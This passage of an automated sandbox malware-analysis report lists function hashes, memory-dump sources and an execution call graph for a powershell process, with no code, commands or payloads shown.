                                                            • Instruction Fuzzy Hash: E9E0927691020DFF9F01DEA18D00CAF7BBEEB48200B00C465BA1496120E6328A31ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B4C3F Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96aa6de6baf7bec63fddc050f8079e6723250dcc0268dae85b2f803338570564
                                                            • Instruction ID: abcba842af9e3e6423795b4867a97c73e36e5784fe7c8fe1d73f5d22f115a00a
                                                            • Opcode Fuzzy Hash: 96aa6de6baf7bec63fddc050f8079e6723250dcc0268dae85b2f803338570564
                                                            • Instruction Fuzzy Hash: 19F0A539E01228CFDB24DB64E854B9DB7B2FB88211F0041E9E949A7261DB355A95CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035BD440 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f90dbfb515c028d7104a0c7fe01061f2b89aa8979b3a94c2686fe1dad6d1a9b4
                                                            • Instruction ID: b639674e3b43d09af78b6cb274e0e9ce691a01347c96e6dce4f48aea9331beaa
                                                            • Opcode Fuzzy Hash: f90dbfb515c028d7104a0c7fe01061f2b89aa8979b3a94c2686fe1dad6d1a9b4
                                                            • Instruction Fuzzy Hash: 38D09E357015245747092659B42C46D7B9EDBCDB62704412FF90AC3B42DF644D024ED9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035AC3CF Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58c43b055c36b0a09b6b74cddba44844859ca71bd0c5f79143bb3a5e838663dd
                                                            • Instruction ID: bb9a72e3424e00ecb0a7fa39d2c09386736624b5c8fbc0243498631681c8902e
                                                            • Opcode Fuzzy Hash: 58c43b055c36b0a09b6b74cddba44844859ca71bd0c5f79143bb3a5e838663dd
                                                            • Instruction Fuzzy Hash: 4BD023F59041404FCF31CF45E98276437F1FDA112130E47D98C05CB912EE27D4019644
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A8590 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7bda13e4059852d5cdc5e9d32281f8685b776f533aa8cbbfd13583316c04dc4
                                                            • Instruction ID: 52356f6bd0dd8c5be8ff4fdd61cf53e5b5b76163a914e5f7e116766cd200c001
                                                            • Opcode Fuzzy Hash: c7bda13e4059852d5cdc5e9d32281f8685b776f533aa8cbbfd13583316c04dc4
                                                            • Instruction Fuzzy Hash: 57D0C9351982489FC30197BCEC66D857BF89E4B92834A44D6E088CBA73D621B855C665
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A85A0 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                            • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                                            • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                            • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 035BF420 Relevance: 5.5, Strings: 4, Instructions: 525COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $Xcl$Xcl$Xcl
                                                            • API String ID: 0-31533983
                                                            • Opcode ID: 451a811d27c29a125ed37a29ab69ee88632cf343f4809dd933262450aebe1168
                                                            • Instruction ID: 6b260b6275aa13a445e27ea95646b3e0b05d649da7d4dd1075d5fbf7ffddc8ee
                                                            • Opcode Fuzzy Hash: 451a811d27c29a125ed37a29ab69ee88632cf343f4809dd933262450aebe1168
                                                            • Instruction Fuzzy Hash: D0121B34B002089FDB24DBB5D854AAEB7B6BF89304F298469D806EB7A5DF30DC41CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035ADD7D Relevance: 2.1, Strings: 1, Instructions: 887COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: ad9c4f331160d74cdd4b54dc04c596124ed7ef42e765d1c21b9b805093a5e0a7
                                                            • Instruction ID: 670adf21b768f106f5671d03504e58dd70e3d942bb453582a4dda12f14c3d9dd
                                                            • Opcode Fuzzy Hash: ad9c4f331160d74cdd4b54dc04c596124ed7ef42e765d1c21b9b805093a5e0a7
                                                            • Instruction Fuzzy Hash: 93824C74B006198FCB14DF74D8647AEB7F6BF88304F1485A9D90AAB761DB309E858F81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035AF060 Relevance: .7, Instructions: 671COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a2089496b39a562ebd3d8baf3dc4a049be8507a91c9d4ed272ef47fc7d9bd07d
                                                            • Instruction ID: 9c15551dee409d2b79265e4a8ff69c0ad66885fd417fd10c7b0fd1662503c755
                                                            • Opcode Fuzzy Hash: a2089496b39a562ebd3d8baf3dc4a049be8507a91c9d4ed272ef47fc7d9bd07d
                                                            • Instruction Fuzzy Hash: 4C327134B006059FDB14EBB8D8A46AEB7E6BFC8205F15C42DD9069B7A0DF34DD028B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035BD698 Relevance: .4, Instructions: 401COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c83068413582239922d66f18f6433480233df819be328ee19b1a58f300cad395
                                                            • Instruction ID: 01f5909b35de75c00fed0b98b654e6003e10cb3053815ea711b25d1898f79ee1
                                                            • Opcode Fuzzy Hash: c83068413582239922d66f18f6433480233df819be328ee19b1a58f300cad395
                                                            • Instruction Fuzzy Hash: 5FD18139B002049FCB14EBB4D854AAEB7F6FFC8600B25856DD8069B7A4DF34DC028B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035AD9D8 Relevance: .4, Instructions: 374COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70c4e4eb963f0a1d2b5b2baaa259a1d8d817a789f5c431782d3612a3736240b3
                                                            • Instruction ID: 864c14e00840a0b063e17dc6bb1aeb9d2ad78e8c3ab791da9b5b7c19aeac43c4
                                                            • Opcode Fuzzy Hash: 70c4e4eb963f0a1d2b5b2baaa259a1d8d817a789f5c431782d3612a3736240b3
                                                            • Instruction Fuzzy Hash: 3EF14B74E006198FCB14DFA8D8507AEB7F2BF89300F1485A9D40AAB761DB309E859F90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035ADA21 Relevance: .4, Instructions: 363COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8e189e438634cd045a424529758d6956901f943dceacc4f59d8d1864a4225b05
                                                            • Instruction ID: 9f6e67f1e8ad0bbdf574667c54478f6426c4149369c6a1b8b48f582f96126983
                                                            • Opcode Fuzzy Hash: 8e189e438634cd045a424529758d6956901f943dceacc4f59d8d1864a4225b05
                                                            • Instruction Fuzzy Hash: E1E14D74E006198FCB14DFB8D8507AEB7F6BF89304F1485A9D40AAB761DB309E858F91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B33D8 Relevance: .2, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 869b53288b4c194f52b0877d1be75826203f33704f2c518bd5e542b9fba18537
                                                            • Instruction ID: 408ec7fc5560940a184ff0e5c58ae33460394bd4d0cc5042004487dc3c58f450
                                                            • Opcode Fuzzy Hash: 869b53288b4c194f52b0877d1be75826203f33704f2c518bd5e542b9fba18537
                                                            • Instruction Fuzzy Hash: 39817038B002458BDB19CFA9D4547EEBBB6BF85304F148469E805EB3A5EB74D945CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A8D20 Relevance: 6.4, Strings: 5, Instructions: 162COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `o1n$`o1n$`o1n$`o1n$`o1n
                                                            • API String ID: 0-544897954
                                                            • Opcode ID: 89d262ee186c015c8ad56279120f193911ca1ce7e185dc975ecee57967b29499
                                                            • Instruction ID: b226855f28672dbf8a19964bc822e198d7e7a5abb089bc8852710627c5cb6f2f
                                                            • Opcode Fuzzy Hash: 89d262ee186c015c8ad56279120f193911ca1ce7e185dc975ecee57967b29499
                                                            • Instruction Fuzzy Hash: 39616834200B04DBC718EB78D46079AB7A6BFC4308F644E6CD58A4F6B5DB71B885CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A8D30 Relevance: 6.4, Strings: 5, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `o1n$`o1n$`o1n$`o1n$`o1n
                                                            • API String ID: 0-544897954
                                                            • Opcode ID: 6e3885f185f12481f438111d477529bed7277dffb36dcfde3f1a5c21466102a7
                                                            • Instruction ID: b0b2a3c5870a5419836720d639047c11c14fd74b5f34b9878f057535677bd1b4
                                                            • Opcode Fuzzy Hash: 6e3885f185f12481f438111d477529bed7277dffb36dcfde3f1a5c21466102a7
                                                            • Instruction Fuzzy Hash: E4514835200B04DBC718EB68D46079AB7A6FFC4308F644E6CD58A4F6A5DB71B885CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:0.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:54.8%
                                                            Total number of Nodes:1342
                                                            Total number of Limit Nodes:68
                                                            execution_graph 14850 1ec51e04 14851 1ec51e10 _vswprintf_s 14850->14851 14853 1ec51e37 _vswprintf_s 14851->14853 14855 1ed1a80d 14851->14855 14856 1ed1a81c 14855->14856 14857 1ecaf18b 14855->14857 14859 1ed0ff41 14856->14859 14860 1ed0ff4d _vswprintf_s 14859->14860 14861 1ed0ffaf _vswprintf_s 14860->14861 14863 1ed12073 14860->14863 14861->14857 14873 1ed0fd22 14863->14873 14865 1ed1207d 14866 1ed12085 14865->14866 14867 1ed120a4 14865->14867 14876 1ed08df1 14866->14876 14869 1ed120be 14867->14869 14884 1ed11c06 GetPEB 14867->14884 14869->14861 14874 1ec99670 _vswprintf_s LdrInitializeThunk 14873->14874 14875 1ed0fd3d 14874->14875 14875->14865 14940 1ecad0e8 14876->14940 14878 1ed08dfd GetPEB 14879 1ed08e10 14878->14879 14880 1ece5720 _vswprintf_s 11 API calls 14879->14880 14881 1ed08e2f 14879->14881 14880->14881 14882 1ecad130 __cftof 11 API calls 14881->14882 14883 1ed08ebd 14882->14883 14883->14861 14885 1ed11c20 GetPEB 14884->14885 14886 1ed11c3d 14884->14886 14888 1ec5b150 __cftof 11 API calls 14885->14888 14887 1ec5b150 __cftof 11 API calls 14886->14887 14889 1ed11c3a 14887->14889 14888->14889 14890 1ec5b150 __cftof 11 API calls 14889->14890 14891 1ed11c5a GetPEB 14890->14891 14893 1ed11d04 14891->14893 14894 1ed11ce7 GetPEB 14891->14894 14896 1ec5b150 __cftof 11 API calls 14893->14896 14895 1ec5b150 __cftof 11 API calls 14894->14895 14897 1ed11d01 14895->14897 14896->14897 14898 1ec5b150 __cftof 11 API calls 14897->14898 14899 1ed11d1c 14898->14899 14900 1ed11d27 GetPEB 14899->14900 14901 1ed11d66 14899->14901 14904 1ed11d32 GetPEB 14900->14904 14905 1ed11d4f 14900->14905 14902 1ed11daf 14901->14902 14903 1ed11d70 GetPEB 14901->14903 14906 1ed11db9 GetPEB 14902->14906 14907 1ed11df8 14902->14907 14910 1ed11d98 14903->14910 14911 1ed11d7b GetPEB 14903->14911 14908 1ec5b150 __cftof 11 API calls 14904->14908 14909 1ec5b150 __cftof 11 API calls 14905->14909 14913 1ed11de1 14906->14913 14914 1ed11dc4 GetPEB 14906->14914 14916 1ed11e0a GetPEB 14907->14916 14920 1ed11e52 GetPEB 14907->14920 14912 1ed11d4c 14908->14912 14909->14912 14917 1ec5b150 __cftof 11 API calls 14910->14917 14915 1ec5b150 __cftof 11 API calls 14911->14915 14923 1ec5b150 __cftof 11 API calls 14912->14923 14919 1ec5b150 __cftof 11 API calls 14913->14919 14918 1ec5b150 __cftof 11 API calls 14914->14918 14924 1ed11d95 14915->14924 14921 1ed11e32 14916->14921 14922 1ed11e15 GetPEB 14916->14922 14917->14924 14926 1ed11dde 14918->14926 14919->14926 14927 1ed11e7a 14920->14927 14928 1ed11e5d GetPEB 14920->14928 14925 1ec5b150 __cftof 11 API calls 14921->14925 14929 1ec5b150 __cftof 11 API calls 14922->14929 14923->14901 14930 1ec5b150 __cftof 11 API calls 14924->14930 14932 1ed11e2f 14925->14932 14931 1ec5b150 __cftof 11 API calls 14926->14931 14934 1ec5b150 __cftof 11 API calls 14927->14934 14933 1ec5b150 __cftof 11 API calls 14928->14933 14929->14932 14930->14902 14931->14907 14935 1ec5b150 __cftof 11 API calls 14932->14935 14936 1ed11e77 14933->14936 14934->14936 14937 1ed11e4f 14935->14937 14938 1ec5b150 __cftof 11 API calls 14936->14938 14937->14920 14939 1ed11e90 GetPEB 14938->14939 14939->14869 14940->14878 14941 1ec836cc 14942 1ec836d4 GetPEB 14941->14942 14943 1ec836e6 14941->14943 14944 1ec836e5 14942->14944 14945 1ec59240 14946 1ec5924c _vswprintf_s 14945->14946 14947 1ec5927e GetPEB 14946->14947 14948 1ec777f0 14947->14948 14949 1ec5929a GetPEB 14948->14949 14950 1ec777f0 14949->14950 14951 1ec592b6 GetPEB 14950->14951 14953 1ec592d2 14951->14953 14952 1ec59330 14953->14952 14954 1ec59305 GetPEB 14953->14954 14955 1ec5931f _vswprintf_s 14954->14955 14956 1eca37cc 14957 1eca37db 14956->14957 14958 1eca37ea 14957->14958 14960 1eca590b 14957->14960 14961 1eca5917 14960->14961 14963 1eca592d 14960->14963 14962 1ec9b58e __cftof 11 API calls 14961->14962 14964 1eca5923 14962->14964 14963->14958 14964->14958 14233 1ec99540 LdrInitializeThunk 14965 1ed1131b 14966 1ec77d50 GetPEB 14965->14966 14967 1ed1134d 14966->14967 14968 1ed11351 GetPEB 14967->14968 14969 1ed11361 _vswprintf_s 14967->14969 14968->14969 14970 1ec9b640 _vswprintf_s 11 API calls 14969->14970 14971 1ed11384 14970->14971 14972 1ed0d380 14973 1ed0d393 14972->14973 14975 1ed0d38c 14972->14975 14974 1ed0d3a0 GetPEB 14973->14974 14974->14975 14976 1ec51190 14977 1ec511a0 14976->14977 14979 1ec511be 14976->14979 14977->14979 14980 1ec511e0 14977->14980 14981 1ec51204 14980->14981 14982 1ec9b640 _vswprintf_s 11 API calls 14981->14982 14983 1ec51296 14982->14983 14983->14979 14238 2cd6316 14239 2cd631a 14238->14239 14239->14239 14240 2cd633f TerminateThread 14239->14240 14241 2cd638f 14240->14241 14991 1ecdb111 14992 1ecdb131 14991->14992 14994 1ecdb143 14991->14994 14995 1ece21b7 14992->14995 14998 1ec9e3a0 14995->14998 15001 1ec9e3bd 14998->15001 15000 1ec9e3b8 15000->14994 15002 1ec9e3cc 15001->15002 15003 1ec9e3e3 15001->15003 15004 1ec9b58e __cftof 11 API calls 15002->15004 15005 1ec9b58e __cftof 11 API calls 15003->15005 15006 1ec9e3d8 _vswprintf_s 15003->15006 15004->15006 15005->15006 15006->15000 15007 1ec50b60 15008 1ec50b72 15007->15008 15010 1ec50baf 15007->15010 15008->15010 15011 1ec50bd0 15008->15011 15012 1ec50c66 15011->15012 15018 1ec50c05 15011->15018 15013 1ecae940 15012->15013 15014 1ecae915 15012->15014 15017 1ec50c8d _vswprintf_s 15012->15017 15016 1eca1700 11 API calls 15013->15016 15013->15017 15014->15017 15020 1eca1700 15014->15020 15016->15017 15017->15010 15018->15012 15018->15017 15019 1eca1700 11 API calls 15018->15019 15019->15018 15023 1eca14e9 15020->15023 15022 1eca171c 15022->15017 15025 1eca14fb 15023->15025 15024 1ec9b58e __cftof 11 API calls 15026 1eca150e __cftof 15024->15026 15025->15024 15025->15026 15026->15022 15027 1ec835a1 15028 1ec835a7 15027->15028 15029 1ec835b8 GetPEB 15028->15029 15030 1ec835b7 15028->15030 15031 1ec6eb70 32 API calls 15029->15031 15031->15030 15032 1ed1bbbb 15033 1ed1bbde 15032->15033 15038 1ed1bd54 15033->15038 15037 1ed1bc3c 15039 1ed1bd63 15038->15039 15040 1ed1bc04 15038->15040 15052 1ec84e70 15039->15052 15040->15037 15042 1ed1f9a1 15040->15042 15043 1ed1f9d6 15042->15043 15058 1ed2022c 15043->15058 15045 1ed1f9e1 15046 1ed1f9e7 15045->15046 15047 1ed1fa16 15045->15047 15064 1ed205ac 15045->15064 15046->15037 15050 1ed1fa1a _vswprintf_s 15047->15050 15080 1ed2070d 15047->15080 15050->15046 15094 1ed20a13 15050->15094 15053 1ec84e94 15052->15053 15057 1ec84ec0 15052->15057 15054 1ec9b640 _vswprintf_s 11 API calls 15053->15054 15055 1ec84eac 15054->15055 15055->15040 15056 1ed08df1 12 API calls 15056->15053 15057->15053 15057->15056 15059 1ed20278 15058->15059 15062 1ed202c2 15059->15062 15102 1ed20ea5 15059->15102 15061 1ed202e9 15061->15045 15062->15061 15129 1ecacf85 15062->15129 15065 1ed205d1 15064->15065 15066 1ed206db 15065->15066 15068 1ed1a80d 27 API calls 15065->15068 15070 1ed20652 15065->15070 15066->15047 15067 1ed1a854 32 API calls 15069 1ed20672 15067->15069 15068->15070 15069->15066 15293 1ed21293 15069->15293 15070->15067 15073 1ec77d50 GetPEB 15074 1ed2069c 15073->15074 15075 1ed206b0 15074->15075 15076 1ed206a0 GetPEB 15074->15076 15075->15066 15077 1ed206ba GetPEB 15075->15077 15076->15075 15077->15066 15078 1ed206c9 15077->15078 15079 1ed1138a 13 API calls 15078->15079 15079->15066 15081 1ed20734 15080->15081 15082 1ed207d2 15081->15082 15083 1ed1afde 32 API calls 15081->15083 15082->15050 15084 1ed20782 15083->15084 15085 1ed21293 32 API calls 15084->15085 15086 1ed2078e 15085->15086 15087 1ec77d50 GetPEB 15086->15087 15088 1ed20793 15087->15088 15089 1ed207a7 15088->15089 15090 1ed20797 GetPEB 15088->15090 15089->15082 15091 1ed207b1 GetPEB 15089->15091 15090->15089 15091->15082 15092 1ed207c0 15091->15092 15297 1ed114fb 15092->15297 15095 1ed20a3c 15094->15095 15305 1ed20392 15095->15305 15098 1ecacf85 32 API calls 15099 1ed20aec 15098->15099 15100 1ed20b19 15099->15100 15101 1ed21074 34 API calls 15099->15101 15100->15046 15101->15100 15133 1ed1ff69 15102->15133 15104 1ed2105b 15106 1ed21055 15104->15106 15173 1ed21074 15104->15173 15105 1ed20f32 15139 1ed1a854 15105->15139 15106->15062 15109 1ed20ecb 15109->15104 15109->15105 15110 1ed1a80d 27 API calls 15109->15110 15110->15105 15111 1ed20fab 15112 1ec77d50 GetPEB 15111->15112 15114 1ed20fcf 15112->15114 15115 1ed20fe3 15114->15115 15116 1ed20fd3 GetPEB 15114->15116 15118 1ed2100e 15115->15118 15119 1ed20fed GetPEB 15115->15119 15116->15115 15117 1ed20f50 15117->15104 15117->15111 15147 1ed215b5 15117->15147 15121 1ec77d50 GetPEB 15118->15121 15119->15118 15120 1ed20ffc 15119->15120 15151 1ed1138a 15120->15151 15123 1ed21013 15121->15123 15124 1ed21027 15123->15124 15125 1ed21017 GetPEB 15123->15125 15126 1ed21041 15124->15126 15159 1ed0fec0 15124->15159 15125->15124 15126->15106 15167 1ed152f8 15126->15167 15131 1ecacf98 15129->15131 15130 1ecacfb1 15130->15061 15131->15130 15132 1ed152f8 32 API calls 15131->15132 15132->15130 15134 1ed1ffd1 15133->15134 15137 1ed1ff9f 15133->15137 15135 1ed1a854 32 API calls 15134->15135 15136 1ed1fff1 15135->15136 15136->15109 15137->15134 15138 1ed1a80d 27 API calls 15137->15138 15138->15134 15140 1ed1a8c0 15139->15140 15141 1ed1a941 15139->15141 15140->15141 15185 1ed1f021 15140->15185 15143 1ed1aa00 15141->15143 15189 1ed153d9 15141->15189 15144 1ec9b640 _vswprintf_s 11 API calls 15143->15144 15146 1ed1aa10 15144->15146 15146->15117 15148 1ed215d0 15147->15148 15149 1ed215d7 15147->15149 15150 1ed2165e LdrInitializeThunk 15148->15150 15149->15117 15150->15149 15152 1ed113af _vswprintf_s 15151->15152 15153 1ec77d50 GetPEB 15152->15153 15154 1ed113d2 15153->15154 15155 1ed113d6 GetPEB 15154->15155 15156 1ed113e6 _vswprintf_s 15154->15156 15155->15156 15157 1ec9b640 _vswprintf_s 11 API calls 15156->15157 15158 1ed1140b 15157->15158 15158->15118 15160 1ed0fee5 _vswprintf_s 15159->15160 15161 1ec77d50 GetPEB 15160->15161 15162 1ed0ff02 15161->15162 15163 1ed0ff06 GetPEB 15162->15163 15164 1ed0ff16 _vswprintf_s 15162->15164 15163->15164 15165 1ec9b640 _vswprintf_s 11 API calls 15164->15165 15166 1ed0ff3b 15165->15166 15166->15126 15168 1ed15321 15167->15168 15169 1ed153c7 15167->15169 15170 1ecd7b9c 32 API calls 15168->15170 15171 1ec9b640 _vswprintf_s 11 API calls 15169->15171 15170->15169 15172 1ed153d5 15171->15172 15172->15106 15174 1ed210b0 15173->15174 15175 1ed21095 15173->15175 15251 1ed1afde 15174->15251 15176 1ed2165e LdrInitializeThunk 15175->15176 15176->15174 15179 1ec77d50 GetPEB 15180 1ed210cd 15179->15180 15181 1ed210e1 15180->15181 15182 1ed210d1 GetPEB 15180->15182 15183 1ed210fa 15181->15183 15260 1ed0fe3f 15181->15260 15182->15181 15183->15106 15188 1ed1f03a 15185->15188 15203 1ed1ee22 15188->15203 15190 1ed15552 15189->15190 15191 1ed153f7 15189->15191 15192 1ed1547c 15190->15192 15195 1ecd7b9c 32 API calls 15190->15195 15193 1ed15403 15191->15193 15194 1ed154eb 15191->15194 15198 1ec9b640 _vswprintf_s 11 API calls 15192->15198 15196 1ed15481 15193->15196 15197 1ed1540b 15193->15197 15194->15192 15199 1ecd7b9c 32 API calls 15194->15199 15195->15192 15196->15192 15201 1ecd7b9c 32 API calls 15196->15201 15197->15192 15235 1ecd7b9c 15197->15235 15200 1ed155bd 15198->15200 15199->15192 15200->15143 15201->15192 15204 1ed1ee5d 15203->15204 15205 1ed1ef09 15204->15205 15206 1ed1ee73 15204->15206 15213 1ed1eef5 15205->15213 15219 1ed1f8c5 15205->15219 15206->15213 15214 1ed1f607 15206->15214 15207 1ec9b640 _vswprintf_s 11 API calls 15208 1ed1efd4 15207->15208 15208->15141 15213->15207 15217 1ed1f626 15214->15217 15215 1ed1eedd 15215->15213 15218 1ec996e0 LdrInitializeThunk 15215->15218 15217->15215 15225 1ed2165e 15217->15225 15218->15213 15220 1ed1f8ea 15219->15220 15221 1ed1f932 15220->15221 15222 1ed1f607 LdrInitializeThunk 15220->15222 15221->15213 15223 1ed1f90f 15222->15223 15223->15221 15234 1ec996e0 LdrInitializeThunk 15223->15234 15226 1ed2166a _vswprintf_s 15225->15226 15227 1ed21869 _vswprintf_s 15226->15227 15229 1ed21d55 15226->15229 15227->15217 15230 1ed21d61 _vswprintf_s 15229->15230 15231 1ed21fc5 _vswprintf_s 15230->15231 15233 1ec996e0 LdrInitializeThunk 15230->15233 15231->15226 15233->15231 15234->15221 15238 1ec91130 15235->15238 15241 1ec9115f 15238->15241 15242 1ecccd96 15241->15242 15243 1ec911a8 15241->15243 15243->15242 15245 1ecccd9d 15243->15245 15248 1ec911e9 _vswprintf_s 15243->15248 15244 1ec9b640 _vswprintf_s 11 API calls 15246 1ec91159 15244->15246 15247 1ed25ba5 32 API calls 15245->15247 15250 1ec912bd 15245->15250 15246->15192 15247->15250 15249 1ec5ccc0 _vswprintf_s 11 API calls 15248->15249 15248->15250 15249->15250 15250->15242 15250->15244 15252 1ed1b039 15251->15252 15253 1ed1b00a 15251->15253 15255 1ed1b035 15252->15255 15277 1ec996e0 LdrInitializeThunk 15252->15277 15253->15252 15254 1ed1b00e 15253->15254 15257 1ed1b026 15254->15257 15268 1ed1f209 15254->15268 15255->15257 15259 1ed153d9 32 API calls 15255->15259 15257->15179 15259->15257 15261 1ed0fe64 _vswprintf_s 15260->15261 15262 1ec77d50 GetPEB 15261->15262 15263 1ed0fe81 15262->15263 15264 1ed0fe85 GetPEB 15263->15264 15265 1ed0fe95 _vswprintf_s 15263->15265 15264->15265 15266 1ec9b640 _vswprintf_s 11 API calls 15265->15266 15267 1ed0feba 15266->15267 15267->15183 15269 1ed1f23b 15268->15269 15270 1ed1f241 15269->15270 15271 1ed1f27a 15269->15271 15278 1ec996e0 LdrInitializeThunk 15270->15278 15272 1ed1f28f _vswprintf_s 15271->15272 15279 1ec996e0 LdrInitializeThunk 15271->15279 15276 1ed1f26d 15272->15276 15280 1ed1f7dd 15272->15280 15276->15255 15277->15255 15278->15276 15279->15272 15281 1ed1f803 15280->15281 15286 1ed1f4a1 15281->15286 15285 1ed1f82d 15285->15276 15287 1ed1f4bc 15286->15287 